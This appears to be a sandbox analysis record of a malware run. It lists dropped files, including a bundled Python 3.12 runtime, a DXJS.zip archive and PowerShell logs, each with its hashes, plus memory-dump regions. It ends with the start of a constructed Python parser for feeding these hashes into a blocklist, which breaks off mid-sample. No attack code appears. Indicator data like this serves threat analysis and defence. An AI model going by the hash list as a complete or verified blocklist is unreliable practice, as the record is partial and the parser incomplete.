| SHA512 | dd517765719ab2832c0665a0631cf11736e032338a5a9e7b015d45327e9b104a5ec60d1e17da5bcc454c3a73e94cdc3091ae504f1e926c45aec988e7b6489d74 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b41b78bfefe2777d0927dbb2a1d60ea5 |
| SHA1 | c14ef2336e20b339f36b9cc196268ec0be507328 |
| SHA256 | f601b89d1bf516e6d10bbe59cc99381c0d020745b6713b9239aa6a1e4858a1fe |
| SHA512 | 72d8ceb723daaab0a7602dc5e67078090e271f8de5a685d5cce5df8b4efe8583ffa8f485dc754a5a28bab6e3b46660d4f79ff9e958cbee8d288776c0c0ea115e |
memory/4924-73-0x00007FFB53CD3000-0x00007FFB53CD5000-memory.dmp
memory/4924-74-0x00007FFB53CD0000-0x00007FFB54791000-memory.dmp
memory/4924-75-0x00007FFB53CD0000-0x00007FFB54791000-memory.dmp
memory/4924-88-0x00007FFB53CD0000-0x00007FFB54791000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 612b19feac3b60bdc771ec888769ea75 |
| SHA1 | cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb |
| SHA256 | 3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1 |
| SHA512 | 2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af |
memory/5524-100-0x000001D9E1810000-0x000001D9E1822000-memory.dmp
C:\Users\Admin\Downloads\DXJS.zip
| MD5 | dea11ad7afe2352257d94caf70880cd9 |
| SHA1 | 67b4fc67e32a8948f0caa69a6d16350834359218 |
| SHA256 | cb3e44b34c2d063429f27fbe76ade8f02c6c9a3cbfb00650ec1437cf93dc2d71 |
| SHA512 | 2dd0c6b9783513a8e7be9ec062c0e0e7e079d94c8290d41b9023de432f354da70fb1553f70ceac56ce134e10ab4b8a0c547c236aeec9ee261b72eaa755a19404 |
memory/5524-101-0x000001D9E1800000-0x000001D9E180A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 9018c8a40c5a2240323b69b16bec5e88 |
| SHA1 | 947bb246ee89086d4ceff9eb028480906efe47dc |
| SHA256 | 3de69fdf7f5c7ef83552608ffd83fad4a65ac363d6d2a747ca3d43734f51766b |
| SHA512 | 8f7a10d7a4c48b9123f651eef1e83c763a6f7fe52fbf8519cf76da2a6f60a3b1a04563f2da81176cd0cc54635ef4cf3e8fb061e3c4216c6d2bb876b2919b7584 |
C:\Users\Admin\Downloads\Python\Python312\Lib\test\cjkencodings\shift_jis-utf8.txt
| MD5 | cc34bcc252d8014250b2fbc0a7880ead |
| SHA1 | 89a79425e089c311137adcdcf0a11dfa9d8a4e58 |
| SHA256 | a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b |
| SHA512 | c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f |
C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\__init__.py
| MD5 | c3239b95575b0ad63408b8e633f9334d |
| SHA1 | 7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc |
| SHA256 | 6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225 |
| SHA512 | 5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25 |
C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\builtin\__main__.py
| MD5 | 47878c074f37661118db4f3525b2b6cb |
| SHA1 | 9671e2ef6e3d9fa96e7450bcee03300f8d395533 |
| SHA256 | b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216 |
| SHA512 | 13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5 |
C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\resources\namespacedata01\binary.file
| MD5 | 37b59afd592725f9305e484a5d7f5168 |
| SHA1 | a02a05b025b928c039cf1ae7e8ee04e7c190c0db |
| SHA256 | 054edec1d0211f624fed0cbca9d4f9400b0e491c43742af2c5b0abebf0c990d8 |
| SHA512 | 4ec54b09e2b209ddb9a678522bb451740c513f488cb27a0883630718571745141920036aebdb78c0b4cd783a4a6eecc937a40c6104e427512d709a634b412f60 |
C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_pydoc\__init__.py
| MD5 | 4a7dba3770fec2986287b3c790e6ae46 |
| SHA1 | 8c7a8f21c1bcdb542f4ce798ba7e97f61bee0ea0 |
| SHA256 | 88db4157a69ee31f959dccbb6fbad3891ba32ad2467fe24858e36c6daccdba4d |
| SHA512 | 4596824f4c06b530ef378c88c7b4307b074f922e10e866a1c06d5a86356f88f1dad54c380791d5cfda470918235b6ead9514b49bc99c2371c1b14dc9b6453210 |
C:\Users\Admin\Downloads\Python\Python312\Scripts\pip3.12.exe
| MD5 | ece8006a0714b569546a3f789638a55a |
| SHA1 | 520ba56fd30bcf1e08eefb390d392905c3470936 |
| SHA256 | e9059568c5f1200915f581cf582da6465d68a4b558972c6b5e3501f4aa63de7b |
| SHA512 | bb8926c7938da517104afab2f34c8dfc3bfb8c64241770b6e36f1170b87059d32e9b81b9b0451735718e62be123c27f6a053630c85e1b5b21ede6aca7062fe5c |
C:\Users\Admin\Downloads\Python\Python312\python.exe
| MD5 | 3d44212bba2d7a88d6c83ce8523bba88 |
| SHA1 | 62ea5374c17b0f2f88f7d4a6c03b592393dba6f8 |
| SHA256 | 15b41a488c356c0e331facdea6c836a6cec021f12d5fde9844e7ca4a1aa0361a |
| SHA512 | 89297f1fbe811b23a38fc3dbc22989dfb9faf97960c65f1f0f43be710204b32f41f33ef0bb893815db71c4462d04b52f686b40801f6d4cbd8e529d740618ac67 |
C:\Users\Admin\Downloads\Python\Python312\vcruntime140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\__init__.cpython-312.pyc
| MD5 | 5793df77b697f1109fe6473952792aca |
| SHA1 | 99d036fd2a4e438bfb89c5cf9fab62292d04d924 |
| SHA256 | 6625882aff1d20e1101d79a6624c16d248a9f5bd0c986296061a1177413c36f3 |
| SHA512 | 809eb8fc67657cc7e4635c27921fffa1d028424724542ef8272a2028f17259c11310e6e4ddfe8c4b2c795e536a40300ec6d6b282b126de90698716cde944e5ad |
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\cp1252.cpython-312.pyc
| MD5 | d42473ce94dd1209f1a2b65e7cc79d8f |
| SHA1 | 56001bd8a180e758e23fa9ff6fe37ec5fc29b6dc |
| SHA256 | d7dc1703ebe0364c99ed7c8b02423b80c2ee6f48f31023ca8b7b836e83dc50db |
| SHA512 | a523186188060a51849627c3dda24d39b414fa613ae7ab3895ed9b108cc96843019bc2fa475462ef33490bac9ee3e76dd868e699055341f66821557141db478b |
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\cp1252.py
| MD5 | 52084150c6d8fc16c8956388cdbe0868 |
| SHA1 | 368f060285ea704a9dc552f2fc88f7338e8017f2 |
| SHA256 | 7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519 |
| SHA512 | 77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4 |
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\utf_8.cpython-312.pyc
| MD5 | 6f9bafab786fdd627c247fbe8e85de01 |
| SHA1 | ce99d8bfaa08e52be5dece42c851684458116988 |
| SHA256 | a225709104aa9d764c01de396add10bbcfb96a7ae019af69d8de81a683b1f245 |
| SHA512 | f53cce6e51e00cb120213810f74016fee82a62be4ed7b5fcdfaefa5f03eaca2e9fc01ad0b7e24860f82d8f2c34fd967e62aeeb04b6a59fe10553c36c96cc79b9 |
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\utf_8.py
| MD5 | f932d95afcaea5fdc12e72d25565f948 |
| SHA1 | 2685d94ba1536b7870b7172c06fe72cf749b4d29 |
| SHA256 | 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e |
| SHA512 | a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6 |
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\aliases.cpython-312.pyc
| MD5 | 1f1314b9020e3c6fe612e34124f9f2b0 |
| SHA1 | 058c5eb8ff54f49905a5579ccdfccb38de087e97 |
| SHA256 | 9c262190210f884f24e4d227cb6e4e9706b2909ff4ab18917bb9c86da0ddde26 |
| SHA512 | f1db57c6456def9001201e5db14523ab2cd97c6aba200699aff11a6e8d352009f072281fdec93cd764c4083778efeab2e34e1b0240b0938c4e0b10763b21bf76 |
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\aliases.py
| MD5 | ff23f6bb45e7b769787b0619b27bc245 |
| SHA1 | 60172e8c464711cf890bc8a4feccff35aa3de17a |
| SHA256 | 1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8 |
| SHA512 | ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9 |
C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__init__.py
| MD5 | ea0e0d20c2c06613fd5a23df78109cba |
| SHA1 | b0cb1bedacdb494271ac726caf521ad1c3709257 |
| SHA256 | 8b997e9f7beef09de01c34ac34191866d3ab25e17164e08f411940b070bc3e74 |
| SHA512 | d8824b315aa1eb44337ff8c3da274e07f76b827af2a5ac0e84d108f7a4961d0c5a649f2d7d8725e02cd6a064d6069be84c838fb92e8951784d6e891ef54737a3 |
C:\Users\Admin\Downloads\Python\Python312\python312.dll
| MD5 | 3c388ce47c0d9117d2a50b3fa5ac981d |
| SHA1 | 038484ff7460d03d1d36c23f0de4874cbaea2c48 |
| SHA256 | c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb |
| SHA512 | e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35 |
C:\Users\Admin\Downloads\Python\Python312\time.py
| MD5 | 214e07e7cce80ea2f0225457ef3a3b79 |
| SHA1 | dcb04163632ee58e4615ee03da045d6523d41dda |
| SHA256 | 0e8e554145cbf714a36df2dc4347414ab147e3bd06494a89ae3d6c7daf817a8a |
| SHA512 | 6c3467e244c8ecdbe5ee7f62d9db8a55f1dd6fd7f15daa3fc929c54d258ba7d72d9d60832378ae2af02bbce5c756bafd9dec5880efe5ed57ecd2d1c80ae2ff19 |
C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__init__.py
| MD5 | d0859d693b9465bd1ff48dfe865833a3 |
| SHA1 | 978c0511ef96d959e0e897d243752bc3a33ba17c |
| SHA256 | bb22c1bd20afd47d33fa6958d8d3e55bea7a1034da8ef2d5f5c0bff1225832c0 |
| SHA512 | 093026a7978122808554add8c53a2ead737caf125a102b8f66b36e5fd677e4dc31a93025511fcf9d0533ad2491d2753f792b3517b4db0cfe0206e58a6d0e646c |
C:\Users\Admin\Downloads\Python\Python312\DLLs\_ctypes.pyd
| MD5 | bbd5533fc875a4a075097a7c6aba865e |
| SHA1 | ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00 |
| SHA256 | be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570 |
| SHA512 | 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e |
C:\Users\Admin\Downloads\Python\Python312\python3.DLL
| MD5 | 79b02450d6ca4852165036c8d4eaed1f |
| SHA1 | ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4 |
| SHA256 | d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123 |
| SHA512 | 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416 |
C:\Users\Admin\Downloads\Python\Python312\DLLs\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\types.cpython-312.pyc
| MD5 | c5d38a269d5b92e2bfde072a30c45e33 |
| SHA1 | 23a0d92d7c87656b952439d7c8bba43049bd535e |
| SHA256 | 83437236d1d5c63d0e5ab989e104cd3bbce11ea2b3509bded6bac3376a360f5b |
| SHA512 | 7ff7179e86f9581d1f71459ca1c6959e0e9cfda2840f26df13f84fab36b823ca10fd5c3966209021348e723269f22afcc69cb089230c86ec5d2d6ae5c10cd505 |
C:\Users\Admin\Downloads\Python\Python312\Lib\types.py
| MD5 | 8303d9715c8089a5633f874f714643a7 |
| SHA1 | cdb53427ca74d3682a666b83f883b832b2c9c9f4 |
| SHA256 | d7ce485ecd8d4d1531d8f710e538b4d1a49378afacb6ff9231e48c645a9fa95e |
| SHA512 | 1a6ca272dde77bc4d133244047fcc821ffcb3adee89d400fe99ece9cf18ab566732d48df2f18f542b228b73b3402a3cace3cd91a9e2b9480b51f7e5e598d3615 |
C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__pycache__\__init__.cpython-312.pyc
| MD5 | e2b942b6814a6d1cad2e720a7b7c1bc6 |
| SHA1 | b1af27740ba54ff33ad8a788e0bea405e4053e7b |
| SHA256 | 2eb5ccbed547f4cb54bd86d1bbdd8a91bdb9f4d7758b09279ba6bca889ef4d5c |
| SHA512 | 5a0248bf8670f28d5c727d33e7d1857c91413a86e3420676c0e35d342252bd638485d25cc7c9e1f42a0cf18330c842f5a5efeb6bc8f1923620b52a99868215c8 |
C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\struct.cpython-312.pyc
| MD5 | 29ae69bad548bcb4adc79ed4bd7f073d |
| SHA1 | 4ce183af84f7cb3c428ef87d97c03c871417026d |
| SHA256 | 038ef897ce5864486e09285946d54c459421b7d10253565c1e2a13857d78b6a9 |
| SHA512 | fb90f1ddddadd634af51d8af4d0cd0a8b5011c754d068410bc723c3f6a442f8bdf8105d69f4f77539c5ffb8c446ece7dbcd84a2f40483d3b7f54fe4e76fb3e08 |
C:\Users\Admin\Downloads\Python\Python312\Lib\struct.py
| MD5 | 5b6fab07ba094054e76c7926315c12db |
| SHA1 | 74c5b714160559e571a11ea74feb520b38231bc9 |
| SHA256 | eadbcc540c3b6496e52449e712eca3694e31e1d935af0f1e26cff0e3cc370945 |
| SHA512 | 2846e8c449479b1c64d39117019609e5a6ea8030220cac7b5ec6b4090c9aa7156ed5fcd5e54d7175a461cd0d58ba1655757049b0bce404800ba70a2f1e12f78c |
C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\base64.cpython-312.pyc
| MD5 | 6a425637cb61c65ae8cfe0d83e6e3b77 |
| SHA1 | d7615d5216ab6d69fbff349bf7e12fe5aa45c741 |
| SHA256 | 575e9d22cf5e94a7c15044c45bd8f7c03fce5b8b92336651d57ea5e20da188f4 |
| SHA512 | 84ca7a4f05bc5fbef41fde057dc10a6cc252c4a371b28657085766638a04beacff22c2ac1588d7b077cac6eebe5bfc7c8aadf4ce4f8468282c2a336f7b8d3e27 |
C:\Users\Admin\Downloads\Python\Python312\Lib\base64.py
| MD5 | 231ae490d92466b1573e541649772154 |
| SHA1 | 4e47769f5a3239f17af2ce1d9a93c411c195a932 |
| SHA256 | 9e685425290c771df1a277b5c7787ad5d4cf0312f2c4b042ce44756df6a3d112 |
| SHA512 | 7084b49f0788bfbe035bc2fe42db7a63b21ebc99f63c03f80dec5569067c1e63312d8c5a754f2d72d7c9bb51fa23ca479fcba78682610eb2b68870cbeae1bea3 |
C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\operator.cpython-312.pyc
| MD5 | 9439ffb1d4bbb5cc97e565e7431c4faf |
| SHA1 | c929fec735d8281ef0e31961b2aae75a8de84b12 |
| SHA256 | 7b691b1b0892c1ac26351847b8e4740cf395e0ef78900efc6d37290f68811691 |
| SHA512 | 38844f9c8953641d1145d194d4f2700fa74865d6b6a1da5b5174081c610486266cd7cda770d0d366a5fa0186c55bbddb2cab399b9e921196579759a0b58f9ffb |
C:\Users\Admin\Downloads\Python\Python312\Lib\operator.py
| MD5 | dc7484406cad1bf2dc4670f25a22e5b4 |
| SHA1 | 189cd94b6fdca83aa16d24787af1083488f83db2 |
| SHA256 | c57b6816cfddfa6e4a126583fca0a2563234018daec2cfb9b5142d855546955c |
| SHA512 | ac55baced6c9eb24bc5ecbc9eff766688b67550e46645df176f6c8a6f3f319476a59ab6fc8357833863895a4ef7f3f99a8dfe0c928e382580dfff0c28ca0d808 |
C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\enum.cpython-312.pyc
| MD5 | bb08f420f5dfd2344aa42e77cd36669c |
| SHA1 | 5e6f66233b1a85bfb8fa1812b8f3b1f63e68151c |
| SHA256 | 23440df45b19d66e0d6177162bb06eb02415cdb8b7ff3acc5bf8b17fd463b1f1 |
| SHA512 | c2811310838e4ba03211117bb06e8434633365959f9e29888450fcaff1d9de0349b65d91f7e3a6603ce9bcaf79e88f5b48e5c557575fda61e4569c8953c9c34a |
C:\Users\Admin\Downloads\Python\Python312\Lib\enum.py
| MD5 | 3a87f9629edad420beb85ab0a1c4482a |
| SHA1 | 30c4c3e70e45128c2c83c290e9e5f63bcfa18961 |
| SHA256 | 9d1b2f7dd26000e03c483bc381c1af20395a3ac25c5fd988fbed742cd5278c9a |
| SHA512 | e0aed24d8a0513e8d974a398f3ff692d105a92153c02d4d6b7d3c8435dedbb9482dc093eb9093fb86b021a28859ab541f444e8acc466d8422031d11040cd692a |
C:\Users\Admin\Downloads\Python\Python312\Lib\re\__pycache__\__init__.cpython-312.pyc
| MD5 | dd2891a001b7a253aec124836d20a4b5 |
| SHA1 | 91f34a7b0204aae4aacef46bb8ce8add60421d3d |
| SHA256 | e71aac7c0a44cf181682c8887ab2139e5d894f94edde24085a26feecbefb77c9 |
| SHA512 | d88dc7450eec5742b9d21f95062cf04ebbf3712d6e20acd4eabafa3cc176d04980f92574a69f32dccbea0454e509660ac4f90e5e49becb54c4c0cd2ee3da2051 |
C:\Users\Admin\Downloads\Python\Python312\Lib\re\__pycache__\_parser.cpython-312.pyc
| MD5 | 09e5ce5d7ad36d1f247b39b7572ab088 |
| SHA1 | cdf17d6fa11ee3e289fb450981b45e17f9e3f6ed |
| SHA256 | 8afed5f696c04709f18f77ece3c0a23712bf6099e7d868d6f4dc6233e7470939 |
| SHA512 | 5c6387153fbc4bbdc4a33eeec4ed24052e6a509148a5aa9b2c1fb20a0c4b909359e0581828c0163d63287372b2d10498184d386c2fe5b0f8f135599859282d12 |
C:\Users\Admin\Downloads\Python\Python312\Lib\re\_parser.py
| MD5 | 6e6309cfa4c0c6c5e6f37bbb68fd899f |
| SHA1 | 289f658ddde22c543691110a059f2849219a545d |
| SHA256 | bcc84f06d54e2d28506350a60bc1aaaa0efda4221f4ceeb05b2d0f48c712c479 |
| SHA512 | be01d8f17425ef1d8f338491de497cb9027fe8aeb0b357c8ddfc31c24f70b170c91759e1d36b2a118252d69b5a0800457c5bcbe3dbbcbfe24a0f6d42c1e0f913 |
C:\Users\Admin\Downloads\Python\Python312\Lib\re\__pycache__\_compiler.cpython-312.pyc
| MD5 | b8057c657205e3fad34b757cffbc705a |
| SHA1 | b850217708595c7fb96e478e967ac3977f6e620a |
| SHA256 | 3278de7883a6e40a1ff99ce6168100d0bc271dcb8936e8514712d7a9744615de |
| SHA512 | 7d49012891bd6193687b829c75e92f7e960d55d95bd3e7a5d88f99d4c9e9de6830fff208b615fe49ff51939fc45fa0ac50003ba3f80b0e00de0285ace9eebf0e |
C:\Users\Admin\Downloads\Python\Python312\Lib\re\_compiler.py
| MD5 | aa86cb1709b99d49518abfa530d307d3 |
| SHA1 | e2ac0d860370beec9e027c6883f06855e32910fc |
| SHA256 | 7151ee39cffc73db023430de5d6d8f13bc8244255c831d5c2934fccc991ca5e0 |
| SHA512 | 265d4cd3a695d0c81645aa80a6f0aabe827cb5413f3aa6946f8407d6eec3a1ffd57bc926fa478b8c60a8eb6d689852c0da8a197821c1c4514abbb303c5f770b1 |
C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\reprlib.cpython-312.pyc
| MD5 | 7be37e702cfe628d2ff7ee74cef7b3ad |
| SHA1 | e21ce6657e561806c8e1155486b97ae3bbeba3fb |
| SHA256 | 6924a3b72dea632fb8fce937e42259894262b13aa3f044c825c95cf942ee35aa |
| SHA512 | bb0d7162fd65f640193b2c5164cb2e3c81a196c885b6a448cf8d3e0ce6769c1e052ad7bde89dec89c9c1ce0998535dbeebca321749f293f4a37e8a6c3c9603d3 |
C:\Users\Admin\Downloads\Python\Python312\Lib\reprlib.py
| MD5 | dfda46ef7019ab30afa5183cf035263d |
| SHA1 | b7cece019304f0c6836c148f85dd3c920c5cd654 |
| SHA256 | 354fd4471a2d8c5972e67a38a8eb40040f12bd9b6acd260a889efed250770f0b |
| SHA512 | 62b6da4124537fe2e891aafe5e7c901368c6f498f5d0de83d524fa2653f9aec731bc8151790fcfe36900b65ff36bb0165142f074977e8b2c808bf0507257adb9 |
C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\keyword.cpython-312.pyc
| MD5 | f54b9393d80136be78dcddae5e1d2aef |
| SHA1 | 2ae1577de2c4c448bb8b6c20e4a56268720d175e |
| SHA256 | 59dc1abb094e9a7cf5277a32ad4e0a285a6530713915627e1a2866f5847359de |
| SHA512 | 813e471182247c2f0c5e2f1cc49130d510fdce2eac3e214a2c63f3fba9f5f21a67f5b669997129cfa25e09465ae9e0b62bfe5da3100a87f95ad2701c6869b132 |
C:\Users\Admin\Downloads\Python\Python312\Lib\keyword.py
| MD5 | a10df1136c08a480ef1d2b39a1f48e4a |
| SHA1 | fc32a1ff5da1db4755ecfae82aa23def659beb13 |
| SHA256 | 1f28f509383273238ad86eda04a96343fa0dc10eeaf3189439959d75cdac0a0b |
| SHA512 | 603f6dc4556cbbd283cf77233727e269c73c6e1b528084e6c6234aefd538313b4acc67ca70a7db03e015a30f817fcfedda2b73de480963ae0eefd486f87463cd |
C:\Users\Admin\Downloads\Python\Python312\Lib\collections\__pycache__\__init__.cpython-312.pyc
| MD5 | 5ded9aebc5bb1b2b7d27443e6e0a9437 |
| SHA1 | 32c060890716c8aced35c92e2e7ba23199a2fd7a |
| SHA256 | 8589a1421368d7b06c7ff575007d85b5cade092062f814b7aa4873c2beade5bc |
| SHA512 | 7509ef1cfc98629fb5916a2913225098d4a84ecd7bb2cac13df80486dc11b478d1e605b1e2bf3b9df89364049de1289269b48b389313937786be985088700af5 |
C:\Users\Admin\Downloads\Python\Python312\Lib\collections\__init__.py
| MD5 | 251382c3e093c311a3e83651cbdbcc11 |
| SHA1 | 28a9de0e827b37280c44684f59fd3fcc54e3eabd |
| SHA256 | 1eb4c4445883fd706016aca377d9e5c378bac0412d7c9b20f71cae695d6bb656 |
| SHA512 | 010b171f3dd0aa676261a3432fe392568f364fe43c6cb4615b641994eb2faf48caabf3080edf3c00a1a65fc43748caaf692a3c7d1311b6c90825ffce185162b0 |
C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\functools.cpython-312.pyc
| MD5 | a8cf4f3f701751740dac394fc396aec7 |
| SHA1 | 73c5cc6c6d08080e788337494b2c39b9703423b6 |
| SHA256 | 3334f1b6609e60a7c5b4d5630654de245ff9a5c8a7072671a850b4a2056319e9 |
| SHA512 | 84e64b35e08e73dffc66d490c52f199fc10f13fab4aab5fd65cb0a1539f555bee6e3524fd353a468a637db165421a6854954e14674dbee12625a6300e092a323 |
C:\Users\Admin\Downloads\Python\Python312\Lib\functools.py
| MD5 | 3638d2608c42e3a3bf3b2b1c51b765f4 |
| SHA1 | be947a9b8301bbedf2406416ac908963279b46cd |
| SHA256 | bd6f192c31c5e266ad9eec9f550b8bc485f90d583764ff81aa3f36d1209f005e |
| SHA512 | 14b60f0b5119b90fcd4db3b0aeb48ec4ca9775910470178796ba54c0d16f8887b9a3d283f925af779a1cc6bc99d25f016cccbf2bb72d4a9099bb821a54a2b418 |
C:\Users\Admin\Downloads\Python\Python312\Lib\re\__init__.py
| MD5 | 02f3e3eb14f899eb53a5955e370c839f |
| SHA1 | e5c3ab0720b80a201f86500ccdc61811ab34c741 |
| SHA256 | 778cdca1fe51cddb7671d7a158c6bdecee1b7967e9f4a0ddf41cfb5320568c42 |
| SHA512 | 839fde2bfd5650009621752ccbceea22de8954bf7327c72941d5224dc2f495da0d1c39ba4920da6314efd1800be2dab94ac4ce29f34dc7d2705fcb6d5ab7b825 |
C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__pycache__\_endian.cpython-312.pyc
| MD5 | 0fda9dc9c51560c5455ddc99b95dcfe8 |
| SHA1 | 46794653086d98b8d64eee575e7a04689beea63a |
| SHA256 | 4bed1c75e896df05229e609fd827d94a5382e92b158595141b487a70600d5c35 |
| SHA512 | 7c110f406deafad91d00468d23c38cc0e76a189ded1e8d9491dc3692fbeb5887cad20ee10a0a97b989fdd67529b2fb8b5ad4e183d535dab1d0f1f254503c83c7 |
C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\_endian.py
| MD5 | 7daa213263c75057cf125267b7fdfbd3 |
| SHA1 | efb9403d8e3f09734f6b2ba3889b274997d0a039 |
| SHA256 | 8c5b9ac7306dcf98856c9b815a5fc604ba0f47acab15ac47ad858499c6981579 |
| SHA512 | 1e00f043ab8f3f77a81c8c6ea6760625bcdf2eccbef6432266f75e89f28778b48bd2709dbcf9d70a4a4e1384629aed31c7fdacdf4723fe18f36b6d9366b03921 |
memory/4268-11415-0x000001F97D710000-0x000001F97D71F000-memory.dmp
memory/4268-11417-0x000001F97F240000-0x000001F97F24E000-memory.dmp
memory/1148-11419-0x0000021561440000-0x0000021561456000-memory.dmp
memory/1148-11421-0x00000215630A0000-0x00000215630B6000-memory.dmp
memory/5136-11423-0x000001EE92690000-0x000001EE9269F000-memory.dmp
memory/5136-11424-0x000001EE942D0000-0x000001EE942DE000-memory.dmp
memory/5656-11427-0x00000188BEF00000-0x00000188BEF12000-memory.dmp
memory/5656-11429-0x00000188C0B50000-0x00000188C0B62000-memory.dmp
memory/516-11466-0x000001CE76F70000-0x000001CE76F78000-memory.dmp
memory/516-11467-0x000001CE76FA0000-0x000001CE76FB0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ac38483b1e9d56556195c2019e9d0a32 |
| SHA1 | 885f52fe21df71bb3b2bd958809eb395c9b42571 |
| SHA256 | e08570b014c5d188e6df8c0c853bae0df484e3f44c28d1d25373b03b3bd5f7d1 |
| SHA512 | f12eef6c36f281094f597496761c74901e4ab526bca427692563b2d203d7891d400204e7cc3bcfe2e854df2a07a8fcfbe4dee094e485556d82a34004ea38834c |
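The listing above is the sandbox's flattened record of dropped files (a CPython 3.12 runtime tree under C:\Users\Admin\Downloads\Python\Python312, then an Edge Preferences file) and of the memory regions it dumped, written as a path line followed by one row per digest, and dump names of the form memory/<pid>-<id>-0x<start>-0x<end>-memory.dmp. As an added example, not part of the original report, the following Python parses that format into records, rejects any digest whose length does not match its algorithm before it can reach a blocklist, and derives each dump's region size from its address range. The sample lines are copied from the page; the function and class names are the example's own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: lines copied from this report's dropped-files listing
# and memory-dump list, in the flattened "path, then hash rows" form the
# sandbox page uses. Raw strings keep the Windows backslashes literal.
SAMPLE_LINES = [
    r"C:\Users\Admin\Downloads\Python\Python312\DLLs\libffi-8.dll",
    "| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |",
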